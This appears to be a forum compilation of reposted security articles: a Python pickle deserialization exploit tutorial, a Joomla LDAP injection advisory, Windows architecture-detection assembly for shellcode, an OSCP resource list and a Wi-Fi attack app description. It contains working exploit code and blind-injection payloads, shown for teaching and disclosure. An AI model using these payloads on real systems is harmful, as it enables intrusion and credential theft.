ICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+ICYjeEQ7DQogICAgICAgICAgICAgIDxNUz4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49IkNsYXNzTmFtZSI+UnVuc3BhY2VJbnZva2U1PC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPFMgTj0iTmFtZXNwYWNlIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uPC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPE5pbCBOPSJTZXJ2ZXJOYW1lIiAvPiYjeEQ7DQogICAgICAgICAgICAgICAgPEkzMiBOPSJIYXNoIj40NjA5MjkxOTI8L0kzMj4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49Ik1pWG1sIj4gJmx0O0NMQVNTIE5BTUU9IlJ1bnNwYWNlSW52b2tlNSIgJmd0OyZsdDtQUk9QRVJUWSBOQU1FPSJ0ZXN0MSIgVFlQRSA9InN0cmluZyIgJmd0OyZsdDsvUFJPUEVSVFkmZ3Q7Jmx0Oy9DTEFTUyZndDs8L1M+JiN4RDsNCiAgICAgICAgICAgICAgPC9NUz4mI3hEOw0KICAgICAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgICAgICA8L0xTVD4mI3hEOw0KICAgICAgICA8L09iaj4mI3hEOw0KICAgICAgPC9NUz4mI3hEOw0KICAgIDwvT2JqPiYjeEQ7DQogICAgPE1TPiYjeEQ7DQogICAgICA8UmVmIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIiAvPiYjeEQ7DQogICAgPC9NUz4mI3hEOw0KICA8L09iaj4mI3hEOw0KPC9PYmpzPgs= Contributing Fork it Create your feature branch (git checkout -b my-new-feature) Commit your changes (git commit -am 'Add some feature') Push to the branch (git push origin my-new-feature) Create new Pull Request Additional Reading Are you my Type? Friday the 13th: JSON Attacks - Slides Friday the 13th: JSON Attacks - Whitepaper Exploiting .NET Managed DCOM Sursa: https://github.com/pwntester/ysoserial.net
-
Explaining and exploiting deserialization vulnerability with Python (EN)
Sat 23 September 2017
Dan Lousqui

Deserialization?

Even though it was neither present in OWASP TOP 10 2013 nor in OWASP TOP 10 2017 RC1, Deserialization of untrusted data is a very serious vulnerability that we can see more and more often in current security disclosures. Serialization and deserialization are mechanisms used in many environments (web, mobile, IoT, ...) when you need to convert any object (it can be an OOM, an array, a dictionary, a file descriptor, ... anything) to something that you can put "outside" of your application (network, file system, database, ...). This conversion works in both ways, and it's very convenient if you need to save or transfer data (e.g. share the status of a game in a multiplayer game, create an "export" / "backup" file in a project, ...). However, we will see in this article how this kind of behavior can be very dangerous... and therefore, why I think this vulnerability will be present in OWASP TOP 10 2017 RC2.

In Python?

With Python, the default library used to serialize and deserialize objects is pickle. It is a really easy to use library (compared to something like sqlite3) and very convenient if you need to persist data. For example, if you want to save objects:

import pickle
import datetime

my_data = {}
my_data['last-modified'] = str(datetime.datetime.now())
my_data['friends'] = ["alice", "bob"]
pickle_data = pickle.dumps(my_data)
with open("backup.data", "wb") as file:
    file.write(pickle_data)

That will create a backup.data file with the following content (non-printable bytes not shown):

last-modifiedqX2017-09-23 00:23:29.986499qXfriendsq]q(XaliceqXbobqeu.

And if you want to retrieve your data with Python, it's easy:

import pickle

with open("backup.data", "rb") as file:
    pickle_data = file.read()

my_data = pickle.loads(pickle_data)
my_data
# {'friends': ['alice', 'bob'], 'last-modified': '2017-09-23 00:23:29.986499'}

Awesome, isn't it?

Introducing... Pickle pRick!

In order to illustrate the awesomeness of pickle in terms of insecurity, I developed a vulnerable application. You can retrieve the application on the TheBlusky/pickle-prick repository. As always with my Docker, just execute the build.sh or build.bat script, and the vulnerable project will be launched.

This application is for Ricks, from the Rick and Morty TV show. For those who don't know this show (shame ...), Rick is a genius scientist who travels between universes and planets for great adventures with his grandson Morty. The show involves many multiverse and time-travel dilemmas. Each universe has its own Rick, so I developed an application for every Rick, so they can trace their adventures by storing when, where and with whom they travelled. Every Rick must be able to use the application, and the data should never be stored on the server, so one Rick cannot see the data of other Ricks. In order to do that, Rick can export his agenda into a pickle_rick.data file that can be imported later.

Obviously, this application is vulnerable (Rick would not offer other Ricks this kind of gift without a backdoor ...). If you don't want to be spoiled and want to play a little game, you should stop reading this article, try to launch the application (locally), and try to pwn it (without looking at the exploit folder, obviously ...).

What's wrong with Pickle?

pickle (like any other serialization / deserialization library) provides a way to execute arbitrary commands (even if few developers know it).
In order to do that, you simply have to create an object and implement a __reduce__(self) method. This method should return a tuple of n elements, the first being a callable and the rest its arguments. The callable will be executed with the underlying arguments, and the result will be the "unserialization" of the object. For example, if you save the following pickle object:

import pickle
import os

class EvilPickle(object):
    def __reduce__(self):
        return (os.system, ('echo Powned', ))

pickle_data = pickle.dumps(EvilPickle())
with open("backup.data", "wb") as file:
    file.write(pickle_data)

And then later, try to deserialize the object:

import pickle

with open("backup.data", "rb") as file:
    pickle_data = file.read()

my_data = pickle.loads(pickle_data)

Powned will be displayed during the loads call, as echo Powned will be executed. It's easy then to imagine what we can do with such a powerful vulnerability.

The exploit

In the pickle-prick application, pickle is used in order to retrieve all adventures:

async def do_import(request):
    session = await get_session(request)
    data = await request.post()
    try:
        pickle_prick = data['file'].file.read()
    except:
        session['errors'] = ["Couldn't read pickle prick file."]
        return web.HTTPFound('/')
    prick = base64.b64decode(pickle_prick.decode())
    session['adventures'] = [i for i in pickle.loads(prick)]
    return web.HTTPFound('/')

So if we upload a malicious pickle, it will be executed. However, if we want to be able to read the result of a code execution, the __reduce__ callable must return an object that matches the adventures signature (which is a list of dictionaries, each having a date, universe, planet and morty). In order to do that, we will use the vulnerability twice: a first time to upload malicious Python code, and a second time to execute it.

1. Generating a payload to generate a payload

We want to upload a Python file that contains a callable that matches the adventures signature and will be executed on the server. Let's write an evil_rick_shell.py file with such code:

def do_evil():
    with open("/etc/passwd") as f:
        data = f.readlines()
    return [{"date": line, "dimension": "//", "planet": "//", "morty": "//"} for line in data]

Now, let's create a pickle that will write this file on the server:

import pickle
import base64
import os

class EvilRick1(object):
    def __reduce__(self):
        with open("evil_rick_shell.py") as f:
            data = f.readlines()
        shell = "\n".join(data)
        return os.system, ("echo '{}' > evil_rick_shell.py".format(shell),)

prick = pickle.dumps(EvilRick1())
if os.name == 'nt':  # Windows trick
    prick = prick[0:3] + b"os" + prick[5:]
pickle_prick = base64.b64encode(prick).decode()
with open("evil_rick1.data", "w") as file:
    file.write(pickle_prick)

This pickle file will trigger an echo '{payload}' > evil_rick_shell.py command on the server, so the payload will be installed. As the os.system callable does not match the adventure signature, uploading evil_rick1.data should return a 500 error, but it will be too late for any security measure.
2. Generating a payload to execute a payload

Now let's create a pickle object that will call the evil_rick_shell.do_evil callable:

import pickle
import base64
import evil_rick_shell

class EvilRick2(object):
    def __reduce__(self):
        return evil_rick_shell.do_evil, ()

prick = pickle.dumps(EvilRick2())
pickle_prick = base64.b64encode(prick).decode()
with open("evil_rick2.data", "w") as file:
    file.write(pickle_prick)

As the evil_rick_shell.do_evil callable matches the adventure signature, uploading evil_rick2.data should be fine, and should add each line of the /etc/passwd file as an adventure.

Putting it all together

Once both payloads are generated, simply upload the first one, then the second one, and you should be able to see this amazing screen:

We can see that the do_evil() payload has been triggered, and we can see the content of the /etc/passwd file. Even though the content of this file is not (really) sensitive, it's quite easy to imagine something more evil to be executed on Rick's server.

How to protect against it

It's simple... don't use pickle (or any other "wannabe" universal and automatic serializer) if you are going to parse untrusted data with it. It's not that hard to write your own convert_data_to_string(data) and convert_string_to_data(string) functions that won't be able to interpret a forged object with malicious code within.

I hope you enjoyed this article, and have fun with it

Dan Lousqui
IT Security Senior Consultant, developer, open source enthusiast, and so much more!

Sursa: https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
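As a minimal sketch of the convert_data_to_string / convert_string_to_data idea from the mitigation section above (my own illustration, assuming the adventure data only contains JSON-serializable types):

import json

def convert_data_to_string(data):
    # json.dumps only emits plain data types, never callables or classes
    return json.dumps(data)

def convert_string_to_data(string):
    # json.loads cannot instantiate arbitrary objects, so a forged payload
    # can at worst yield unexpected plain values, not code execution
    return json.loads(string)

adventures = [{"date": "2017-09-23", "universe": "C-137",
               "planet": "Earth", "morty": "Morty"}]
assert convert_string_to_data(convert_data_to_string(adventures)) == adventures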
-
Screenshots Description IMPORTANT: This app works with Windows 10 Pro and Home but not with Windows 10 S. We've updated WinDbg to have more modern visuals, faster windows, a full-fledged scripting experience, and Time Travel Debugging, all with the easily extensible debugger data model front and center. WinDbg Preview is using the same underlying engine as WinDbg today, so all the commands, extensions, and workflows you're used to will still work as they did before. See http://aka.ms/windbgblog and https://go.microsoft.com/fwlink/p/?linkid=854349 for more information! Sursa: https://www.microsoft.com/en-us/store/p/windbg-preview/9pgjgd53tn86
-
September 24, 2017

Detecting Architecture in Windows

After a while I thought of posting something interesting I noticed. Some of you know this old method of detecting the architecture using the CS segment register. This was also used in the Kronos malware:

xor eax, eax
mov ax, cs
shr eax, 5

I had a look at the segment registers last night and I found out that we can use the ES, GS and FS segment registers for detecting the architecture as well.

Using ES

; Author : @OsandaMalith
main:
    xor eax, eax
    mov ax, es
    ror ax, 0x3
    and eax, 0x1
    test eax, eax
    je thirtytwo
    invoke MessageBox, 0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
    jmp exit
thirtytwo:
    invoke MessageBox, 0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
exit:
    invoke ExitProcess, 0

Using GS

; Author : @OsandaMalith
main:
    xor eax, eax
    mov eax, gs
    test eax, eax
    je thirtytwo
    invoke MessageBox, 0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
    jmp exit
thirtytwo:
    invoke MessageBox, 0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
exit:
    invoke ExitProcess, 0
.end main

Using TEB

Apart from that, you can also use the TEB + 0xc0 entry, which is 'WOW32Reserved'.

; Author : @OsandaMalith
main:
    xor eax, eax
    mov eax, [FS:0xc0]
    test eax, eax
    je thirtytwo
    invoke MessageBox, 0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
    jmp exit
thirtytwo:
    invoke MessageBox, 0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
exit:
    invoke ExitProcess, 0
.end main

I included all in one and coded a small C application. I'm sure there might be many other tricks to detect the architecture. This might come in handy in shellcoding.

#include <Windows.h>
#include <wchar.h>

/*
 * Author: Osanda Malith Jayathissa - @OsandaMalith
 * Website: https://osandamalith.com
 * Description: Few tricks that you can use to detect the architecture in Windows
 * Link : http://osandamalith.com/2017/09/24/detecting-architecture-in-windows/
 */

BOOL detectArch_ES() {
#if defined(_MSC_VER)
    _asm {
        xor eax, eax
        mov ax, es
        ror ax, 0x3
        and eax, 0x1
    }
#elif defined(__GNUC__)
    asm(
        ".intel_syntax noprefix;"
        "xor eax, eax;"
        "mov ax, es;"
        "ror ax, 0x3;"
        "and eax, 0x1;"
    );
#endif
}

BOOL detectArch_GS() {
#if defined(_MSC_VER)
    _asm {
        xor eax, eax
        mov ax, gs
    }
#elif defined(__GNUC__)
    asm(
        ".intel_syntax noprefix;"
        "xor eax, eax;"
        "mov ax, gs;"
    );
#endif
}

BOOL detectArch_TEB() {
#if defined(_MSC_VER)
    _asm {
        xor eax, eax
        mov eax, fs:[0xc0]
    }
#elif defined(__GNUC__)
    asm(
        ".intel_syntax noprefix;"
        "xor eax, eax;"
        "mov eax, fs:[0xc0];"
    );
#endif
}

int main(int argc, char* argv[]) {
    wprintf( !detectArch_ES()  ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" );
    wprintf( !detectArch_GS()  ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" );
    wprintf( !detectArch_TEB() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" );
    return 1337;
}

Sursa: https://osandamalith.com/2017/09/24/detecting-architecture-in-windows/
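For comparison with the undocumented tricks above, the documented way to get the same answer is the IsWow64Process API. A quick sketch in Python using ctypes (my addition, not part of the original post; like the assembly tricks, it assumes Windows and a 32-bit process, since a 64-bit interpreter is never running under WOW64):

import ctypes
from ctypes import wintypes

def running_on_64bit_windows():
    # A 32-bit process on 64-bit Windows runs under WOW64;
    # IsWow64Process reports exactly that condition.
    kernel32 = ctypes.windll.kernel32
    is_wow64 = wintypes.BOOL(False)
    kernel32.IsWow64Process(kernel32.GetCurrentProcess(),
                            ctypes.byref(is_wow64))
    return bool(is_wow64.value)

print("You are Running 64-bit" if running_on_64bit_windows()
      else "You are Running 32-bit")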
-
OSCP Certification
by ciaranmcnally

Given I have been working in information security for the past few years, I became well aware of the different certifications available as a means of professional development. The certification that stood out as gaining the most respect from the security community seemed to be the "(OSCP) Offensive Security Certified Professional" certificate; I witnessed this time and time again in conversations online. The reason often given is that it is a tough 24-hour practical exam vs a multiple-choice questionnaire like many other security certificates. The OSCP is also listed regularly as a desirable requirement for many different kinds of infosec engineering jobs. I recently received confirmation that I have successfully achieved this certification.

To anyone interested in pursuing the OSCP, I would completely encourage it. There is no way you can come away from this experience without adding a few new tricks or tools to your security skills arsenal, and aside from all of that, it's also very fun. This certificate will demonstrate to clients or to any potential employer that you have a good wide understanding of penetration testing with a practical skill-set to back up the knowledge. I wanted to get this as I've had clients in the past not follow up on using my services due to me not having any official security certificates (especially CREST-craving, UK-based customers). Hopefully this opens up some doors to new customers.

Before undertaking this course I already had a lot of experience performing vulnerability assessments and penetration tests, I also had a few CVEs under my belt and have been quite active in the wider information security community by creating tools, taking part in bug bounties and being a fan of responsible disclosure in general. I found the challenge presented by this exam to be quite humbling and very much a worthwhile engagement. I would describe the Hacking with Kali course materials and videos as very entry-level friendly, which is perfect for someone with a keen interest looking to learn the basics of penetration testing. The most valuable part of the course for those already familiar with the basics is the interactive lab environment; this is an amazing experience and it's hard not to get excited thinking about it. There were moments of frustration and teeth-grinding but it was a very enjoyable way to sharpen skills and try out new techniques or tools.

I signed up for the course initially a full year ago while working full time on contracts and found it extremely difficult to find the time to work on the labs as I had multiple ongoing projects and was doing bug bounties quite actively too. I burnt out fairly quickly and didn't concentrate on it at all. I did one or two of the "known to be hard" machines in the labs fairly easily which convinced me I was ready, and sat the exam having compromised less than 10 of the lab hosts. This was of course silly and I only managed 2 roots and one local access shell, which wasn't near enough points to pass and very much dulled my arrogance at the time. I didn't submit an exam report and decided to focus on my contracts and dedicate my time to the labs properly at a later date. Fast forward over a year later to the start of this month (September) and I had 2 weeks free that I couldn't get contract work for. So I purchased a lab extension with the full intention of dedicating my time completely to obtaining this certificate.
In the two weeks I got around 20 or so lab machines and set the date for my first real exam attempt. This went well but I didn't quite make it over the line. I rooted 3 machines and fell short of privilege escalating on a 4th Windows host. I was so close and possibly could have passed if I had done the lab report and exercises; however, this time around I wasn't upset by the failure and became more determined than ever to keep trying. I booked another 2 weeks in the labs, focused on machines with manual Windows privilege escalation and booked my next exam sitting, successfully nailing it.

As I had learned a lot of penetration testing skills doing bug bounties, I found that it was very easy to identify and gain remote access to the lab machines; I usually gained remote shell access within the first 20 or 30 minutes for the large majority of the attempted targets. I very quickly found out that my weakest area was local privilege escalation. During my contract engagements, it is a regular occurrence that my clients request I don't elevate any further with a remote code execution issue on a live production environment. This activity is also greatly discouraged in bug bounties so I can very much see why I didn't have much skill in this area. The OSCP lab environment taught me a large amount of techniques and different ways of accomplishing this. I feel I have massively skilled up with regard to privilege escalation on Linux or Windows hosts.

I'm very happy to join the ranks of the (OSCP) Offensive Security Certified Professionals and would like to thank anyone who helped me on this journey by providing me with links to quality material produced by the finest of hackers. Keeping the hacker knowledge sharing mantra in mind, below is a categorized list of very useful resources I have used during my journey to achieving certification. I hope these help you to overcome many obstacles by trying harder!
Mixed

https://www.nop.cat/nmapscans/
https://github.com/1N3/PrivEsc
https://github.com/xapax/oscp/blob/master/linux-template.md
https://github.com/xapax/oscp/blob/master/windows-template.md
https://github.com/slyth11907/Cheatsheets
https://github.com/erik1o6/oscp/
https://backdoorshell.gitbooks.io/oscp-useful-links/content/
https://highon.coffee/blog/lord-of-the-root-walkthrough/

MsfVenom

https://www.offensive-security.com/metasploit-unleashed/msfvenom/
https://netsec.ws/?p=331

Shell Escape Techniques

https://netsec.ws/?p=337
https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
https://airnesstheman.blogspot.ca/2011/05/breaking-out-of-jail-restricted-shell.html
https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells

Pivoting

http://www.fuzzysecurity.com/tutorials/13.html
http://exploit.co.il/networking/ssh-tunneling/
https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117
https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
https://www.offensive-security.com/metasploit-unleashed/portfwd/

Linux Privilege Escalation

https://0x90909090.blogspot.ie/2015/07/no-one-expect-command-execution.html
https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/#gref
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/mzet-/linux-exploit-suggester
https://github.com/SecWiki/linux-kernel-exploits
https://highon.coffee/blog/linux-commands-cheat-sheet/
https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
https://github.com/lucyoa/kernel-exploits
https://www.rebootuser.com/?p=1758
https://www.securitysift.com/download/linuxprivchecker.py
https://www.youtube.com/watch?v=dk2wsyFiosg
https://www.youtube.com/watch?v=2NMB-pfCHT8
https://www.youtube.com/watch?v=1A7yJxh-fyc

Windows Privilege Escalation

https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/
https://github.com/foxglovesec/RottenPotato
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
https://github.com/pentestmonkey/windows-privesc-check
https://github.com/PowerShellMafia/PowerSploit
https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Windows/Windows_Privilege_Escalation.md
https://github.com/SecWiki/windows-kernel-exploits
https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://toshellandback.com/2015/11/24/ms-priv-esc/
https://www.gracefulsecurity.com/privesc-unquoted-service-path/
https://www.commonexploits.com/unquoted-service-paths/
https://www.exploit-db.com/dll-hijacking-vulnerable-applications/
https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be

Sursa: https://securit.ie/blog/?p=70
-
I don't know who they are and I haven't heard of them, but since it's free and they have nothing to gain from it (only donations), it seems like an OK idea to me.
-
It happens, it's not that big a deal, I think.
-
What a bunch of haters you are, these people are trying to build something useful. Wait until filelist goes down and you'll see how much you'll be looking for something like this...
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
NetRipper now supports SSL hooking for the latest Chrome x64 version: https://github.com/NytroRST/NetRipper/ -
Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection
20 Sep 2017 by Dr. Johannes Dahse, Robin Peraglie

With over 84 million downloads, Joomla! is one of the most popular content management systems in the World Wide Web. It powers about 3.3% of all websites' content and articles. Our code analysis solution RIPS detected a previously unknown LDAP injection vulnerability in the login controller. This one vulnerability could allow remote attackers to leak the super user password with blind injection techniques and to fully take over any Joomla! <= 3.7.5 installation within seconds that uses LDAP for authentication. Joomla! has fixed the vulnerability in the latest version 3.8.

Requirements - Who is affected

Installations with the following requirements are affected by this vulnerability:

- Joomla! version 1.5 <= 3.7.5 is installed
- Joomla! is configured to use LDAP for authentication

This is not a configuration flaw and an attacker does not need any privileges to exploit this vulnerability.

Impact - What can an attacker do

By exploiting a vulnerability in the login page, an unprivileged remote attacker can efficiently extract all authentication credentials of the LDAP server that is used by the Joomla! installation. These include the username and password of the super user, the Joomla! administrator. An attacker can then use the hijacked information to login to the administrator control panel and to take over the Joomla! installation, as well as potentially the web server, by uploading custom Joomla! extensions for remote code execution.

Vulnerability Analysis - CVE-2017-14596

Our code analysis solution RIPS automatically identified the vulnerability that spans over the following nested code lines. First, in the LoginController the Joomla! application receives the user-supplied credentials from the login form.

/administrator/components/com_login/controller.php

class LoginController extends JControllerLegacy
{
    public function login()
    {
        ⋮
        $app = JFactory::getApplication();
        ⋮
        $model = $this->getModel('login');
        $credentials = $model->getState('credentials');
        ⋮
        $app->login($credentials, array('action' => 'core.login.admin'));
    }
}

The credentials are passed on to the login method which then invokes the authenticate method.

/libraries/cms/application/cms.php

class JApplicationCms extends JApplicationWeb
{
    public function login($credentials, $options = array())
    {
        ⋮
        $authenticate = JAuthentication::getInstance();
        $authenticate->authenticate($credentials, $options);
    }
}

/libraries/joomla/authentication/authentication.php

class JAuthentication extends JObject
{
    public function authenticate($credentials, $options = array())
    {
        ⋮
        $plugin->onUserAuthenticate($credentials, $options, $response);
    }
}

Based on the plugin that is used for authentication, the authenticate method passes the credentials to the onUserAuthenticate method. If Joomla! is configured to use LDAP for authentication, the LDAP plugin's method is invoked.

/plugins/authentication/ldap/ldap.php

class PlgAuthenticationLdap extends JPlugin
{
    public function onUserAuthenticate($credentials, $options, &$response)
    {
        ⋮
        $userdetails = $ldap->simple_search(
            str_replace(
                '[search]',
                $credentials['username'],
                $this->params->get('search_string')
            )
        );
    }
}

In the LDAP plugin, the username credential is embedded into the LDAP query specified in the search_string option. According to the official Joomla!
documentation, the search_string configuration option is "a query string used to search for the user, where [search] is directly replaced by search text from the login field", for example "uid=[search]". The LDAP query is then passed to the simple_search method of the LdapClient which connects to the LDAP server and performs the ldap_search.

/libraries/vendor/joomla/ldap/src/LdapClient.php

class LdapClient
{
    public function simple_search($search)
    {
        $results = explode(';', $search);
        foreach ($results as $key => $result)
        {
            $results[$key] = '(' . $result . ')';
        }
        return $this->search($results);
    }

    public function search(array $filters, ...)
    {
        foreach ($filters as $search_filter)
        {
            $search_result = @ldap_search($res, $dn, $search_filter, $attr);
            ⋮
        }
    }
}

Even if RIPS is unaware of the exact LDAP query that is loaded from an external configuration file, RIPS successfully detects and reports the root cause of this vulnerability: user input is mixed unsanitized with LDAP query markup that is passed to the sensitive ldap_search function. The vulnerability was detected within 7 minutes in half a million lines of Joomla! code. The truncated analysis results are available in our RIPS demo application. Please note that we limited the results to the issues described in this post in order to ensure a fix is available. See RIPS report

Proof Of Concept - Blind LDAP Injection

The lack of input sanitization of the username credential used in the LDAP query allows an adversary to modify the result set of the LDAP search. By using wildcard characters and by observing different authentication error messages, the attacker can literally search for login credentials progressively by sending a row of payloads that guess the credentials character by character.

XXX;(&(uid=Admin)(userPassword=A*))
XXX;(&(uid=Admin)(userPassword=B*))
XXX;(&(uid=Admin)(userPassword=C*))
...
XXX;(&(uid=Admin)(userPassword=s*))
...
XXX;(&(uid=Admin)(userPassword=se*))
...
XXX;(&(uid=Admin)(userPassword=sec*))
...
XXX;(&(uid=Admin)(userPassword=secretPassword))

Each of these payloads yields exactly one out of two possible states, which allows an adversary to abuse the server as an oracle. A filter bypass, not covered in this blog post, is necessary for exploitation. With an optimized version of these payloads one bit per request can be extracted from the LDAP server, which results in a highly efficient blind LDAP injection attack.

Time Line

Date        What
2017/07/27  Provided vulnerability details and PoC to vendor
2017/07/29  Vendor confirmed security issue
2017/09/19  Vendor released fixed version

Summary

As one of the most popular open source CMS applications, Joomla! receives many code reviews from the security community. Yet a single missed security vulnerability in the 500,000 lines of code can lead to a server compromise. With the help of static code analysis, RIPS detected a critical LDAP injection vulnerability (CVE-2017-14596) that remained undiscovered for over 8 years. The vulnerability allows an attacker to steal login credentials from Joomla! installations that use LDAP authentication. We would like to thank the Joomla! Security Strike Team for an excellent coordination and remediation of this issue and recommend to update to the latest Joomla! version 3.8 immediately.

More about RIPS

Author: Dr. Johannes Dahse, CEO, Co-Founder

Johannes has been exploiting security vulnerabilities in PHP code for 10 years. He is an active speaker at academic and industry conferences and a recognized expert in this field. He achieved his Ph.D.
in IT security / static code analysis at the Ruhr-University Bochum, Germany. Previously, he worked as a security consultant for leading companies worldwide. Sursa: https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
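To get a feel for how the oracle described in the PoC section would be automated, here is a rough Python sketch of the character-by-character extraction loop. This is my own illustration, not from the advisory: the URL, form field names and the oracle condition are assumptions, and a real exploit would additionally need the filter bypass that the authors do not disclose.

import string
import requests

URL = "http://joomla.example/index.php"   # placeholder target
CHARSET = string.ascii_letters + string.digits

def oracle(payload):
    # Submit the payload as the login username and distinguish the two
    # response states; the exact indicator is installation-specific.
    r = requests.post(URL, data={"username": payload, "password": "x"})
    return "marker-for-match" in r.text   # placeholder check

password = ""
while True:
    for c in CHARSET:
        guess = "XXX;(&(uid=Admin)(userPassword=%s*))" % (password + c)
        if oracle(guess):
            password += c
            print(password)
            break
    else:
        break  # no character extended the prefix: password recovered
print("Extracted password: %s" % password)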
-
USENIX
Published on Sep 15, 2017

Philipp Koppe, Benjamin Kollenda, Marc Fyrbiak, Christian Kison, Robert Gawlik, Christof Paar, and Thorsten Holz, Ruhr-University Bochum

Microcode is an abstraction layer on top of the physical components of a CPU and present in most general-purpose CPUs today. In addition to facilitate complex and vast instruction sets, it also provides an update mechanism that allows CPUs to be patched in-place without requiring any special hardware. While it is well-known that CPUs are regularly updated with this mechanism, very little is known about its inner workings given that microcode and the update mechanism are proprietary and have not been throughly analyzed yet. In this paper, we reverse engineer the microcode semantics and inner workings of its update mechanism of conventional COTS CPUs on the example of AMD's K8 and K10 microarchitectures. Furthermore, we demonstrate how to develop custom microcode updates. We describe the microcode semantics and additionally present a set of microprograms that demonstrate the possibilities offered by this technology. To this end, our microprograms range from CPU-assisted instrumentation to microcoded Trojans that can even be reached from within a web browser and enable remote code execution and cryptographic implementation attacks.

View the full program: https://www.usenix.org/sec17/program
-
Hijacker Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses. This application requires an ARM android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as Xperia Z2, LG G2 etc) will work with Nexmon (it also supports some other chipsets). Devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable. The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included. Root is also necessary, as these tools need root to work. Features Information Gathering View a list of access points and stations (clients) around you (even hidden ones) View the activity of a specific network (by measuring beacons and data packets) and its clients Statistics about access points and stations See the manufacturer of a device (AP or station) from the OUI database See the signal power of devices and filter the ones that are closer to you Save captured packets in .cap file Attacks Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target) Deauthenticate a specific client from the network it's connected MDK3 Beacon Flooding with custom options and SSID list MDK3 Authentication DoS for a specific network or to everyone Capture a WPA handshake or gather IVs to crack a WEP network Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter) Other Leave the app running in the background, optionally with a notification Copy commands or MAC addresses to clipboard Includes the required tools, no need for manual installation Includes the nexmon driver and management utility for BCM4339 devices Set commands to enable and disable monitor mode automatically Crack .cap files with a custom wordlist Create custom actions and run them on an access point or a client easily Sort and filter Access Points with many parameters Export all the gathered information to a file Add an alias to a device (by MAC) for easier identification More Screenshots Installation Make sure: you are on Android 5+ you are rooted (SuperSU is required, if you are on CM/LineageOS install SuperSU) have a firmware to support Monitor Mode on your wireless interface Download the latest version here. When you run Hijacker for the first time, you will be asked whether you want to install the nexmon firmware or go to home screen. If you have installed your firmware or use an external adapter, you can just go to the home screen. Otherwise, click 'Install Nexmon' and follow the instructions. Keep in mind that on some devices, changing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the firmware you will land on the home screen and airodump will start. Make sure you have enabled your WiFi and it's in monitor mode. Troubleshooting This app is designed and tested for ARM devices. All the binaries included are compiled for that architecture and will not work on anything else. 
You can check by going to settings: if you have the option to install nexmon, then you are on the correct architecture, otherwise you will have to install all the tools manually (busybox, aircrack-ng suite, mdk3, reaver, wireless tools, libfakeioctl.so library) and set the 'Prefix' option for the tools to preload the library they need. In settings, there is an option to test the tools. If something fails, then you can click 'Copy test command' and select the tool that fails. This will copy a test command to your clipboard, which you can run in a terminal and see what's wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the 'Send feedback' feature of the app in settings. If the app happens to crash, a new activity will start which will generate a report in your external storage and give you the option to send it directly or by email. I suggest you do that, and if you are worried about what will be sent you can check it out yourself, it's just a txt file in your external storage directory. The part with the most important information is shown in the activity. Please do not report bugs for devices that are not supported or when you are using an outdated version. Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on your network. It's not the app's fault, it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected.

Warning

Legal

It is highly illegal to use this application against networks for which you don't have permission. You can use it only on YOUR network or a network that you are authorized to audit. Using software that puts a network adapter in promiscuous mode may be considered illegal even without actively using it against someone, and don't think for a second it's untraceable. I am not responsible for how you use this application and any damages you may cause.

Device

